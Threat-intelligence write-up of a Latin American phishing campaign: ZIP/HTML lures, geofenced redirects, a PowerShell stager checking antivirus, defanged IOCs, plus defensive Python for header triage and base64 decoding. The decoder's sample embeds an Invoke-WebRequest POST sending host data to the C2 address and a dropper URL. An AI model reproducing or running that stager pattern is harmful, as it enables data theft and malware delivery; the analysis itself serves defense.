cyware: Phishing Deception – Suspended Domains Reveal Malicious Payload for Latin American Region

Summary: This article discusses a recent phishing campaign targeting the Latin American region. The campaign involves phishing emails with ZIP file attachments that lead to malicious file downloads posing as invoices.

Threat Actor: Unknown
Victim: Latin American region

Key Points:

  • The phishing campaign involves emails with ZIP file attachments that contain HTML files leading to malicious file downloads.
  • The email headers use the domain ‘temporary[.]link’ and the User-Agent Roundcube Webmail, which are often abused in phishing activity.
  • The phishing emails use concatenated URLs and the extracted HTML files contain malicious URLs.
  • The malicious URLs redirect to a suspended page or a Cloudflare captcha page for human verification.
  • The campaign uses newly created domains hosted on an IP address and some of the domains have contacts in Mexico.
  • The malicious payload includes a PowerShell script that checks the victim’s machine for information and presence of antivirus products.
  • The PowerShell script contains base64 encoded strings that decode to URLs for further malicious downloads.
  • One of the decoded URLs leads to a ZIP file download containing suspicious files, including an executable AutoIt file.

Recently, we observed a phishing campaign targeting the Latin American region. The phishing email contained a ZIP file attachment that, when extracted, reveals an HTML file leading to a malicious file download posing as an invoice.

Figure 1. Phishing email sample with zip file attachment

Upon checking the email header, we see that the sender address uses the domain ‘temporary[.]link’. The User-Agent header also shows Roundcube Webmail, which is likewise often abused in phishing activity.

Figure 1.2. Email Header of the phishing email
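The header traits described above (a temporary[.]link sender, a Roundcube Webmail User-Agent, an archive attachment) can be checked mechanically at the mail gateway or during triage. The following Python snippet is an added example, not code from the original post; the sample message it parses is constructed to reproduce those traits.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample message reproducing the traits the article calls out.
# It is not a real message from the campaign.
SAMPLE_EML = """\
From: "Facturacion" <cobranza@temporary.link>
To: victim@example.com
Subject: Factura pendiente
User-Agent: Roundcube Webmail/1.6.1
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Adjunto su factura.
--b1
Content-Type: application/zip; name="factura.zip"
Content-Disposition: attachment; filename="factura.zip"
Content-Transfer-Encoding: base64

UEsDBAoAAAAAAA==
--b1--
"""

SUSPICIOUS_SENDER_DOMAINS = {"temporary.link"}
ARCHIVE_EXTENSIONS = (".zip", ".rar", ".7z")


def triage_email(raw: str) -> list[str]:
    """Return the phishing indicators from the write-up found in a raw message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # Sender domain check: the campaign's headers used temporary.link.
    _, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    if domain in SUSPICIOUS_SENDER_DOMAINS:
        findings.append(f"sender domain {domain}")

    # Roundcube Webmail in User-Agent is frequently abused in phishing.
    if "roundcube" in msg.get("User-Agent", "").lower():
        findings.append("Roundcube Webmail user-agent")

    # Compressed attachments carried the HTML lure in this campaign.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(ARCHIVE_EXTENSIONS):
            findings.append(f"archive attachment {name}")
    return findings
```

Any single finding is only a weak signal; the combination of all three is what makes a message worth holding for review.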

In this sample, the attached HTML file contains a concatenated URL.

Figure 2. Snippet of the source-code of the HTML file with concatenated URL

Normally, accessing the given URL will lead to a suspended page.

Figure 3. Suspended page when accessed from a different region

Further research on the URL involved showed, based on our internal telemetry, that it is hosted on the IP 89[.]116[.]32[.]138.

Figure 4. List of domains hosted on IP 89[.]116[.]32[.]138

These domains are newly created (about one year old), their name servers are under Cloudflare, and the registrant contacts of some of the domains are in Mexico.

Figure 5. The domain information from whois[.]com

However, if the URL is accessed from a Mexico-based IP, it redirects to a captcha page for human verification, which in turn leads to another URL, hxxps[://]facturas[.]co[.]in/index[.]php?va, that downloads a malicious RAR file.

Figure 6. URL Redirection to Cloudflare captcha page when accessed using a Mexico based IP

Figure 7. Extracted malicious batch file with malicious URL connection

Upon inspection, the RAR file contains a malicious payload: a PowerShell script that collects information about the victim’s machine, such as computer name and operating system, and checks for the presence of an antivirus product.

We also observed several base64-encoded strings in the script. One of them, when decoded, contains another URL request that uses the POST method.

Figure 8. Snippet of the code with base64 encoded strings

The decoded URL hxxp[://]86[.]38[.]217[.]167/ps/index[.]php checks the user’s country.

Figure 9. The feedback when URL hxxp[://]86[.]38[.]217[.]167/ps/index[.]php was accessed

Another notable base64-encoded string contains a malicious URL that downloads a malicious ZIP file.

Figure 9.1. Snippet of the code with base64 encoded strings that contains another malicious URL download
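When a script hides its beacon and download URLs behind base64 literals, as described in the two passages above, a triage step that decodes every base64-looking literal and keeps only the ones that yield printable text surfaces those URLs without running the script. The Python below is an added example, not the campaign's script or the authors' tooling; its sample PowerShell fragment is constructed here and encodes the write-up's defanged URLs, plus one decoy literal that decodes to binary garbage.

```python
import base64
import re
import string

# Quoted literals that look like base64; short ones are mostly false positives.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
# Matches both live (http) and defanged (hxxp, [://]) URL forms.
URL_PATTERN = re.compile(r'h(?:tt|xx)ps?(?:://|\[://\])[^\s"\'<>)]+')
PRINTABLE = set(string.printable)

BEACON = "Invoke-WebRequest -Uri hxxp[://]86[.]38[.]217[.]167/ps/index[.]php -Method Post -Body $info"
DROPPER_URL = ("hxxps[://]www[.]dropbox[.]com/scl/fi/k6hxua7lwt1qcgmqou6q3/m[.]zip"
               "?rlkey=7wu6x4pfvbt64atx11uqpk34l&dl=1")


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed PowerShell fragment in the style the article describes; the
# literals are built from the defanged URLs quoted in the write-up so the
# sample is reproducible. This is not the campaign's actual script.
SAMPLE_PS1 = (
    '$info = "$env:COMPUTERNAME|" + (Get-CimInstance Win32_OperatingSystem).Caption\n'
    '$av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct\n'
    '$c1 = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("' + _b64(BEACON) + '"))\n'
    '$c2 = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("' + _b64(DROPPER_URL) + '"))\n'
    '$junk = "ABCDEFGHIJKLMNOPQRST"\n'  # valid base64 alphabet, decodes to non-text
)


def decode_embedded_strings(script: str) -> list[str]:
    """Decode every quoted base64-looking literal that yields printable text."""
    decoded = []
    for literal in B64_LITERAL.findall(script):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or decodes to binary: skip the decoy
        if all(ch in PRINTABLE for ch in text):
            decoded.append(text)
    return decoded


def extract_urls(script: str) -> list[str]:
    """URLs found in the script once the base64 layer is peeled off."""
    urls = []
    for text in decode_embedded_strings(script):
        urls.extend(URL_PATTERN.findall(text))
    return urls
```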

The decoded malicious URL was hxxps[://]www[.]dropbox[.]com/scl/fi/k6hxua7lwt1qcgmqou6q3/m[.]zip?rlkey=7wu6x4pfvbt64atx11uqpk34l&dl=1. Downloading and extracting the ZIP file revealed many highly suspicious files. Some files were newly modified, while others were quite old, last modified in 2016. One of the listed files was also an executable AutoIt file. This campaign’s characteristics are quite similar to those observed in previous “Horabot” campaigns.

Figure 10. Extracted ZIP file with suspicious executable AutoIt file

Conclusion

Understandably, from the threat actors’ point of view, phishing campaigns always try different ways to hide malicious activity and avoid immediate detection. To do so, some phishing emails now include compressed file attachments, obfuscated code, or even PowerShell scripts that often lead to malware downloads. Using newly created domains and making them accessible only from specific countries is another evasion technique, especially when the domain behaves differently depending on the target country.

Also, please remember that it’s very important to be wary of emails containing file attachments or URLs that appear to lead to an inaccessible or suspended page, as they may actually lead to more malicious threats.

IOCs:

  • hxxps[://]facturasmex[.]cloud
  • hxxps[://]facturas[.]co[.]in/index[.]php?va
  • hxxp[://]ad2[.]gotdns[.]ch/22/22
  • hxxp[://]86[.]38[.]217[.]167/ps/index[.]php
  • hxxps[://]www[.]dropbox[.]com/scl/fi/k6hxua7lwt1qcgmqou6q3/m[.]zip?rlkey=7wu6x4pfvbt64atx11uqpk34l&dl=1

References

https://whois.com

https://blog.talosintelligence.com/new-horabot-targets-americas/

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/